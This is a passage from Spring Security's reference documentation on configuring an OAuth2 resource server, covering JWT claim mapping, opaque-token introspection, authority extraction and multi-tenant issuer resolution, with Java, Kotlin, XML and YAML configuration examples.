OAuth2TokenValidatorResult.failure(error);\n }\n }\n}\n\n\/\/ ...\n\nOAuth2TokenValidator<Jwt> audienceValidator() {\n return new AudienceValidator();\n}\n----\n\nThen, to add into a resource server, it's a matter of specifying the `JwtDecoder` instance:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> audienceValidator = audienceValidator();\n OAuth2TokenValidator<Jwt> withIssuer = JwtValidators.createDefaultWithIssuer(issuerUri);\n OAuth2TokenValidator<Jwt> withAudience = new DelegatingOAuth2TokenValidator<>(withIssuer, audienceValidator);\n\n jwtDecoder.setJwtValidator(withAudience);\n\n return jwtDecoder;\n}\n----\n\n[[oauth2resourceserver-jwt-claimsetmapping]]\n=== Configuring Claim Set Mapping\n\nSpring Security uses the https:\/\/bitbucket.org\/connect2id\/nimbus-jose-jwt\/wiki\/Home[Nimbus] library for parsing JWTs and validating their signatures.\nConsequently, Spring Security is subject to Nimbus's interpretation of each field value and how to coerce each into a Java type.\n\nFor example, because Nimbus remains Java 7 compatible, it doesn't use `Instant` to represent timestamp fields.\n\nAnd it's entirely possible to use a different library or for JWT processing, which may make its own coercion decisions that need adjustment.\n\nOr, quite simply, a resource server may want to add or remove claims from a JWT for domain-specific reasons.\n\nFor these purposes, Resource Server supports mapping the JWT claim set with `MappedJwtClaimSetConverter`.\n\n[[oauth2resourceserver-jwt-claimsetmapping-singleclaim]]\n==== Customizing the Conversion of a Single Claim\n\nBy default, `MappedJwtClaimSetConverter` will attempt to coerce claims into the following types:\n\n|============\n| Claim | Java Type\n| `aud` | `Collection<String>`\n| `exp` | `Instant`\n| `iat` | `Instant`\n| `iss` | `String`\n| `jti` | `String`\n| `nbf` | `Instant`\n| `sub` | `String`\n|============\n\nAn individual claim's conversion strategy can be configured using `MappedJwtClaimSetConverter.withDefaults`:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n\n MappedJwtClaimSetConverter converter = MappedJwtClaimSetConverter\n .withDefaults(Collections.singletonMap(\"sub\", this::lookupUserIdBySub));\n jwtDecoder.setClaimSetConverter(converter);\n\n return jwtDecoder;\n}\n```\nThis will keep all the defaults, except it will override the default claim converter for `sub`.\n\n[[oauth2resourceserver-jwt-claimsetmapping-add]]\n==== Adding a Claim\n\n`MappedJwtClaimSetConverter` can also be used to add a custom claim, for example, to adapt to an existing system:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"custom\", custom -> \"value\"));\n```\n\n[[oauth2resourceserver-jwt-claimsetmapping-remove]]\n==== Removing a Claim\n\nAnd removing a claim is also simple, using the same API:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"legacyclaim\", legacy -> null));\n```\n\n[[oauth2resourceserver-jwt-claimsetmapping-rename]]\n==== Renaming a Claim\n\nIn more sophisticated scenarios, like consulting multiple claims at once or renaming a claim, Resource Server accepts any class that implements `Converter<Map<String, Object>, Map<String,Object>>`:\n\n```java\npublic class UsernameSubClaimAdapter implements Converter<Map<String, Object>, Map<String, Object>> {\n private final MappedJwtClaimSetConverter delegate =\n MappedJwtClaimSetConverter.withDefaults(Collections.emptyMap());\n\n public Map<String, Object> convert(Map<String, Object> claims) {\n Map<String, Object> convertedClaims = this.delegate.convert(claims);\n\n String username = (String) convertedClaims.get(\"user_name\");\n convertedClaims.put(\"sub\", username);\n\n return convertedClaims;\n }\n}\n```\n\nAnd then, the instance can be supplied like normal:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n jwtDecoder.setClaimSetConverter(new UsernameSubClaimAdapter());\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-jwt-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusJwtDecoder` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder(RestTemplateBuilder builder) {\n RestOperations rest = builder\n .setConnectionTimeout(60000)\n .setReadTimeout(60000)\n .build();\n\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).restOperations(rest).build();\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-opaque-minimalconfiguration]]\n=== Minimal Configuration for Introspection\n\nTypically, an opaque token can be verified via an https:\/\/tools.ietf.org\/html\/rfc7662[OAuth 2.0 Introspection Endpoint], hosted by the authorization server.\nThis can be handy when revocation is a requirement.\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server that uses introspection consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the introspection endpoint details.\n\n[[oauth2resourceserver-opaque-introspectionuri]]\n==== Specifying the Authorization Server\n\nTo specify where the introspection endpoint is, simply do:\n\n[source,yaml]\n----\nsecurity:\n oauth2:\n resourceserver:\n opaque-token:\n introspection-uri: https:\/\/idp.example.com\/introspect\n client-id: client\n client-secret: secret\n----\n\nWhere `https:\/\/idp.example.com\/introspect` is the introspection endpoint hosted by your authorization server and `client-id` and `client-secret` are the credentials needed to hit that endpoint.\n\nResource Server will use these properties to further self-configure and subsequently validate incoming JWTs.\n\n[NOTE]\nWhen using introspection, the authorization server's word is the law.\nIf the authorization server responses that the token is valid, then it is.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate Opaque Bearer Tokens.\n\nThis startup process is quite a bit simpler than for JWTs since no endpoints need to be discovered and no additional validation rules get added.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n```http\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n```\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven an Opaque Token, Resource Server will\n\n1. Query the provided introspection endpoint using the provided credentials and the token\n2. Inspect the response for an `{ 'active' : true }` attribute\n3. Map each scope to an authority with the prefix `SCOPE_`\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `{security-api-url}org\/springframework\/security\/oauth2\/core\/OAuth2AuthenticatedPrincipal.html[OAuth2AuthenticatedPrincipal]` object, and `Authentication#getName` maps to the token's `sub` property, if one is present.\n\nFrom here, you may want to jump to:\n\n* <<oauth2resourceserver-opaque-attributes,Looking Up Attributes Post-Authentication>>\n* <<oauth2resourceserver-opaque-authorization-extraction,Extracting Authorities Manually>>\n* <<oauth2resourceserver-opaque-jwt-introspector,Using Introspection with JWTs>>\n\n[[oauth2resourceserver-opaque-attributes]]\n=== Looking Up Attributes Post-Authentication\n\nOnce a token is authenticated, an instance of `BearerTokenAuthentication` is set in the `SecurityContext`.\n\nThis means that it's available in `@Controller` methods when using `@EnableWebMvc` in your configuration:\n\n[source,java]\n----\n@GetMapping(\"\/foo\")\npublic String foo(BearerTokenAuthentication authentication) {\n return authentication.getTokenAttributes().get(\"sub\") + \" is the subject\";\n}\n----\n\nSince `BearerTokenAuthentication` holds an `OAuth2AuthenticatedPrincipal`, that also means that it's available to controller methods, too:\n\n[source,java]\n----\n@GetMapping(\"\/foo\")\npublic String foo(@AuthenticationPrincipal OAuth2AuthenticatedPrincipal principal) {\n return principal.getAttribute(\"sub\") + \" is the subject\";\n}\n----\n\n==== Looking Up Attributes Via SpEL\n\nOf course, this also means that attributes can be accessed via SpEL.\n\nFor example, if using `@EnableGlobalMethodSecurity` so that you can use `@PreAuthorize` annotations, you can do:\n\n```java\n@PreAuthorize(\"principal?.attributes['sub'] == 'foo'\")\npublic String forFoosEyesOnly() {\n return \"foo\";\n}\n```\n\n[[oauth2resourceserver-opaque-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server.\nWhen use Opaque Token, this `WebSecurityConfigurerAdapter` looks like:\n\n.Default Opaque Token Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::opaqueToken);\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\noverride fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken { }\n }\n }\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n.Custom Opaque Token Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n .introspector(myIntrospector())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_message:read\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspector = myIntrospector()\n }\n }\n }\n }\n}\n----\n====\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is an `OpaqueTokenIntrospector`, which decodes `String` tokens into validated instances of `OAuth2AuthenticatedPrincipal`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new NimbusOpaqueTokenIntrospector(introspectionUri, clientId, clientSecret);\n}\n----\n\nIf the application doesn't expose a `OpaqueTokenIntrospector` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `introspectionUri()` and `introspectionClientCredentials()` or replaced using `introspector()`.\n\nOr, if you're not using Spring Boot at all, then both of these components - the filter chain and a `OpaqueTokenIntrospector` can be specified in XML.\n\nThe filter chain is specified like so:\n\n.Default Opaque Token Configuration\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"opaqueTokenIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nAnd the `OpaqueTokenIntrospector` like so:\n\n.Opaque Token Introspector\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<bean id=\"opaqueTokenIntrospector\"\n class=\"org.springframework.security.oauth2.server.resource.introspection.NimbusOpaqueTokenIntrospector\">\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.introspection_uri}\"\/>\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.client_id}\"\/>\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.opaquetoken.client_secret}\"\/>\n<\/bean>\n----\n====\n\n[[oauth2resourceserver-opaque-introspectionuri-dsl]]\n==== Using `introspectionUri()`\n\nAn authorization server's Introspection Uri can be configured <<oauth2resourceserver-opaque-introspectionuri,as a configuration property>> or it can be supplied in the DSL:\n\n.Introspection URI Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredIntrospectionUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n .introspectionUri(\"https:\/\/idp.example.com\/introspect\")\n .introspectionClientCredentials(\"client\", \"secret\")\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredIntrospectionUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspectionUri = \"https:\/\/idp.example.com\/introspect\"\n introspectionClientCredentials(\"client\", \"secret\")\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<bean id=\"opaqueTokenIntrospector\"\n class=\"org.springframework.security.oauth2.server.resource.introspection.NimbusOpaqueTokenIntrospector\">\n <constructor-arg value=\"https:\/\/idp.example.com\/introspect\"\/>\n <constructor-arg value=\"client\"\/>\n <constructor-arg value=\"secret\"\/>\n<\/bean>\n----\n====\n\nUsing `introspectionUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-opaque-introspector-dsl]]\n==== Using `introspector()`\n\nMore powerful than `introspectionUri()` is `introspector()`, which will completely replace any Boot auto configuration of `OpaqueTokenIntrospector`:\n\n.Introspector Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredIntrospector extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .opaqueToken(opaqueToken -> opaqueToken\n .introspector(myCustomIntrospector())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredIntrospector : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n opaqueToken {\n introspector = myCustomIntrospector()\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"myCustomIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-opaque-authorization-extraction,authority mapping>>, <<oauth2resourceserver-opaque-jwt-introspector,JWT revocation>>, or <<oauth2resourceserver-opaque-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-opaque-introspector-bean]]\n==== Exposing a `OpaqueTokenIntrospector` `@Bean`\n\nOr, exposing a `OpaqueTokenIntrospector` `@Bean` has the same effect as `introspector()`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new NimbusOpaqueTokenIntrospector(introspectionUri, clientId, clientSecret);\n}\n----\n\n[[oauth2resourceserver-opaque-authorization]]\n=== Configuring Authorization\n\nAn OAuth 2.0 Introspection endpoint will typically return a `scope` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from an Opaque Token, the corresponding expressions should include this prefix:\n\n.Authorization Opaque Token Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MappedAuthorities extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests -> authorizeRequests\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::opaqueToken);\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <opaque-token introspector-ref=\"opaqueTokenIntrospector\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nOr similarly with method security:\n\n```java\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) {}\n```\n\n[[oauth2resourceserver-opaque-authorization-extraction]]\n==== Extracting Authorities Manually\n\nBy default, Opaque Token support will extract the scope claim from an introspection response and parse it into individual `GrantedAuthority` instances.\n\nFor example, if the introspection response were:\n\n[source,json]\n----\n{\n \"active\" : true,\n \"scope\" : \"message:read message:write\"\n}\n----\n\nThen Resource Server would generate an `Authentication` with two authorities, one for `message:read` and the other for `message:write`.\n\nThis can, of course, be customized using a custom `OpaqueTokenIntrospector` that takes a look at the attribute set and converts in its own way:\n\n[source,java]\n----\npublic class CustomAuthoritiesOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal principal = this.delegate.introspect(token);\n return new DefaultOAuth2AuthenticatedPrincipal(\n principal.getName(), principal.getAttributes(), extractAuthorities(principal));\n }\n\n private Collection<GrantedAuthority> extractAuthorities(OAuth2AuthenticatedPrincipal principal) {\n List<String> scopes = principal.getAttribute(OAuth2IntrospectionClaimNames.SCOPE);\n return scopes.stream()\n .map(SimpleGrantedAuthority::new)\n .collect(Collectors.toList());\n }\n}\n----\n\nThereafter, this custom introspector can be configured simply by exposing it as a `@Bean`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new CustomAuthoritiesOpaqueTokenIntrospector();\n}\n----\n\n[[oauth2resourceserver-opaque-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusOpaqueTokenIntrospector` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic OpaqueTokenIntrospector introspector(RestTemplateBuilder builder) {\n RestOperations rest = builder\n .basicAuthentication(clientId, clientSecret)\n .setConnectionTimeout(60000)\n .setReadTimeout(60000)\n .build();\n\n return new NimbusOpaqueTokenIntrospector(introspectionUri, rest);\n}\n```\n\n[[oauth2resourceserver-opaque-jwt-introspector]]\n=== Using Introspection with JWTs\n\nA common question is whether or not introspection is compatible with JWTs.\nSpring Security's Opaque Token support has been designed to not care about the format of the token -- it will gladly pass any token to the introspection endpoint provided.\n\nSo, let's say that you've got a requirement that requires you to check with the authorization server on each request, in case the JWT has been revoked.\n\nEven though you are using the JWT format for the token, your validation method is introspection, meaning you'd want to do:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n opaque-token:\n introspection-uri: https:\/\/idp.example.org\/introspection\n client-id: client\n client-secret: secret\n----\n\nIn this case, the resulting `Authentication` would be `BearerTokenAuthentication`.\nAny attributes in the corresponding `OAuth2AuthenticatedPrincipal` would be whatever was returned by the introspection endpoint.\n\nBut, let's say that, oddly enough, the introspection endpoint only returns whether or not the token is active.\nNow what?\n\nIn this case, you can create a custom `OpaqueTokenIntrospector` that still hits the endpoint, but then updates the returned principal to have the JWTs claims as the attributes:\n\n[source,java]\n----\npublic class JwtOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private JwtDecoder jwtDecoder = new NimbusJwtDecoder(new ParseOnlyJWTProcessor());\n\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal principal = this.delegate.introspect(token);\n try {\n Jwt jwt = this.jwtDecoder.decode(token);\n return new DefaultOAuth2AuthenticatedPrincipal(jwt.getClaims(), NO_AUTHORITIES);\n } catch (JwtException e) {\n throw new OAuth2IntrospectionException(e);\n }\n }\n\n private static class ParseOnlyJWTProcessor extends DefaultJWTProcessor<SecurityContext> {\n \tJWTClaimsSet process(SignedJWT jwt, SecurityContext context)\n throws JOSEException {\n return jwt.getJWTClaimSet();\n }\n }\n}\n----\n\nThereafter, this custom introspector can be configured simply by exposing it as a `@Bean`:\n\n[source,java]\n----\n@Bean\npublic OpaqueTokenIntrospector introspector() {\n return new JwtOpaqueTokenIntropsector();\n}\n----\n\n[[oauth2resourceserver-opaque-userinfo]]\n=== Calling a `\/userinfo` Endpoint\n\nGenerally speaking, a Resource Server doesn't care about the underlying user, but instead about the authorities that have been granted.\n\nThat said, at times it can be valuable to tie the authorization statement back to a user.\n\nIf an application is also using `spring-security-oauth2-client`, having set up the appropriate `ClientRegistrationRepository`, then this is quite simple with a custom `OpaqueTokenIntrospector`.\nThis implementation below does three things:\n\n* Delegates to the introspection endpoint, to affirm the token's validity\n* Looks up the appropriate client registration associated with the `\/userinfo` endpoint\n* Invokes and returns the response from the `\/userinfo` endpoint\n\n[source,java]\n----\npublic class UserInfoOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private final OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private final OAuth2UserService oauth2UserService = new DefaultOAuth2UserService();\n\n private final ClientRegistrationRepository repository;\n\n \/\/ ... constructor\n\n @Override\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal authorized = this.delegate.introspect(token);\n Instant issuedAt = authorized.getAttribute(ISSUED_AT);\n Instant expiresAt = authorized.getAttribute(EXPIRES_AT);\n ClientRegistration clientRegistration = this.repository.findByRegistrationId(\"registration-id\");\n OAuth2AccessToken token = new OAuth2AccessToken(BEARER, token, issuedAt, expiresAt);\n OAuth2UserRequest oauth2UserRequest = new OAuth2UserRequest(clientRegistration, token);\n return this.oauth2UserService.loadUser(oauth2UserRequest);\n }\n}\n----\n\nIf you aren't using `spring-security-oauth2-client`, it's still quite simple.\nYou will simply need to invoke the `\/userinfo` with your own instance of `WebClient`:\n\n[source,java]\n----\npublic class UserInfoOpaqueTokenIntrospector implements OpaqueTokenIntrospector {\n private final OpaqueTokenIntrospector delegate =\n new NimbusOpaqueTokenIntrospector(\"https:\/\/idp.example.org\/introspect\", \"client\", \"secret\");\n private final WebClient rest = WebClient.create();\n\n @Override\n public OAuth2AuthenticatedPrincipal introspect(String token) {\n OAuth2AuthenticatedPrincipal authorized = this.delegate.introspect(token);\n return makeUserInfoRequest(authorized);\n }\n}\n----\n\nEither way, having created your `OpaqueTokenIntrospector`, you should publish it as a `@Bean` to override the defaults:\n\n[source,java]\n----\n@Bean\nOpaqueTokenIntrospector introspector() {\n return new UserInfoOpaqueTokenIntrospector(...);\n}\n----\n\n[[oauth2reourceserver-opaqueandjwt]]\n=== Supporting both JWT and Opaque Token\n\nIn some cases, you may have a need to access both kinds of tokens.\nFor example, you may support more than one tenant where one tenant issues JWTs and the other issues opaque tokens.\n\nIf this decision must be made at request-time, then you can use an `AuthenticationManagerResolver` to achieve it, like so:\n\n[source,java]\n----\n@Bean\nAuthenticationManagerResolver<HttpServletRequest> tokenAuthenticationManagerResolver() {\n BearerTokenResolver bearerToken = new DefaultBearerTokenResolver();\n JwtAuthenticationProvider jwt = jwt();\n OpaqueTokenAuthenticationProvider opaqueToken = opaqueToken();\n\n return request -> {\n if (useJwt(request)) {\n return jwt::authenticate;\n } else {\n return opaqueToken::authenticate;\n }\n }\n}\n----\n\nNOTE: The implementation of `useJwt(HttpServletRequest)` will likely depend on custom request material like the path.\n\nAnd then specify this `AuthenticationManagerResolver` in the DSL:\n\n.Authentication Manager Resolver\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(this.tokenAuthenticationManagerResolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server authentication-manager-resolver-ref=\"tokenAuthenticationManagerResolver\"\/>\n<\/http>\n----\n====\n\n[[oauth2resourceserver-multitenancy]]\n=== Multi-tenancy\n\nA resource server is considered multi-tenant when there are multiple strategies for verifying a bearer token, keyed by some tenant identifier.\n\nFor example, your resource server may accept bearer tokens from two different authorization servers.\nOr, your authorization server may represent a multiplicity of issuers.\n\nIn each case, there are two things that need to be done and trade-offs associated with how you choose to do them:\n\n1. Resolve the tenant\n2. Propagate the tenant\n\n==== Resolving the Tenant By Claim\n\nOne way to differentiate tenants is by the issuer claim. Since the issuer claim accompanies signed JWTs, this can be done with the `JwtIssuerAuthenticationManagerResolver`, like so:\n\n.Multitenancy Tenant by JWT Claim\n====\n.Java\n[source,java,role=\"primary\"]\n----\nJwtIssuerAuthenticationManagerResolver authenticationManagerResolver = new JwtIssuerAuthenticationManagerResolver\n (\"https:\/\/idp.example.org\/issuerOne\", \"https:\/\/idp.example.org\/issuerTwo\");\n\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(authenticationManagerResolver)\n );\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <oauth2-resource-server authentication-manager-resolver-ref=\"authenticationManagerResolver\"\/>\n<\/http>\n\n<bean id=\"authenticationManagerResolver\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtIssuerAuthenticationManagerResolver\">\n <constructor-arg>\n <list>\n <value>https:\/\/idp.example.org\/issuerOne<\/value>\n <value>https:\/\/idp.example.org\/issuerTwo<\/value>\n <\/list>\n <\/constructor-arg>\n<\/bean>\n----\n====\n\nThis is nice because the issuer endpoints are loaded lazily.\nIn fact, the corresponding `JwtAuthenticationProvider` is instantiated only when the first request with the corresponding issuer is sent.\nThis allows for an application startup that is independent from those authorization servers being up and available.\n\n===== Dynamic Tenants\n\nOf course, you may not want to restart the application each time a new tenant is added.\nIn this case, you can configure the `JwtIssuerAuthenticationManagerResolver` with a repository of `AuthenticationManager` instances, which you can edit at runtime, like so:\n\n[source,java]\n----\nprivate void addManager(Map<String, AuthenticationManager> authenticationManagers, String issuer) {\n\tJwtAuthenticationProvider authenticationProvider = new JwtAuthenticationProvider\n\t (JwtDecoders.fromIssuerLocation(issuer));\n\tauthenticationManagers.put(issuer, authenticationProvider::authenticate);\n}\n\n\/\/ ...\n\nJwtIssuerAuthenticationManagerResolver authenticationManagerResolver =\n new JwtIssuerAuthenticationManagerResolver(authenticationManagers::get);\n\nhttp\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .authenticationManagerResolver(authenticationManagerResolver)\n );\n----\n\nIn this case, you construct `JwtIssuerAuthenticationManagerResolver` with a strategy for obtaining the `AuthenticationManager` given the issuer.\nThis approach allows us to add and remove elements from the repository (shown as a `Map` in the snippet) at runtime.\n\nNOTE: It would be unsafe to simply take any issuer and construct an `AuthenticationManager` from it.\nThe issuer should be one that the code can verify from a trusted source like a whitelist.\n\n===== Parsing the Claim Only Once\n\nYou may have observed that this strategy, while simple, comes with the trade-off that the JWT is parsed once by the `AuthenticationManagerResolver` and then again by the `JwtDecoder` later on in the request.\n\nThis extra parsing can be alleviated by configuring the `JwtDecoder` directly with a `JWTClaimSetAwareJWSKeySelector` from Nimbus:\n\n[source,java]\n----\n@Component\npublic class TenantJWSKeySelector\n implements JWTClaimSetAwareJWSKeySelector<SecurityContext> {\n\n\tprivate final TenantRepository tenants; <1>\n\tprivate final Map<String, JWSKeySelector<SecurityContext>> selectors = new ConcurrentHashMap<>(); <2>\n\n\tpublic TenantJWSKeySelector(TenantRepository tenants) {\n\t\tthis.tenants = tenants;\n\t}\n\n\t@Override\n\tpublic List<? extends Key> selectKeys(JWSHeader jwsHeader, JWTClaimsSet jwtClaimsSet, SecurityContext securityContext)\n\t\t\tthrows KeySourceException {\n\t\treturn this.selectors.computeIfAbsent(toTenant(jwtClaimsSet), this::fromTenant)\n\t\t\t\t.selectJWSKeys(jwsHeader, securityContext);\n\t}\n\n\tprivate String toTenant(JWTClaimsSet claimSet) {\n\t\treturn (String) claimSet.getClaim(\"iss\");\n\t}\n\n\tprivate JWSKeySelector<SecurityContext> fromTenant(String tenant) {\n\t\treturn Optional.ofNullable(this.tenantRepository.findById(tenant)) <3>\n\t\t .map(t -> t.getAttrbute(\"jwks_uri\"))\n\t\t\t\t.map(this::fromUri)\n\t\t\t\t.orElseThrow(() -> new IllegalArgumentException(\"unknown tenant\"));\n\t}\n\n\tprivate JWSKeySelector<SecurityContext> fromUri(String uri) {\n\t\ttry {\n\t\t\treturn JWSAlgorithmFamilyJWSKeySelector.fromJWKSetURL(new URL(uri)); <4>\n\t\t} catch (Exception e) {\n\t\t\tthrow new 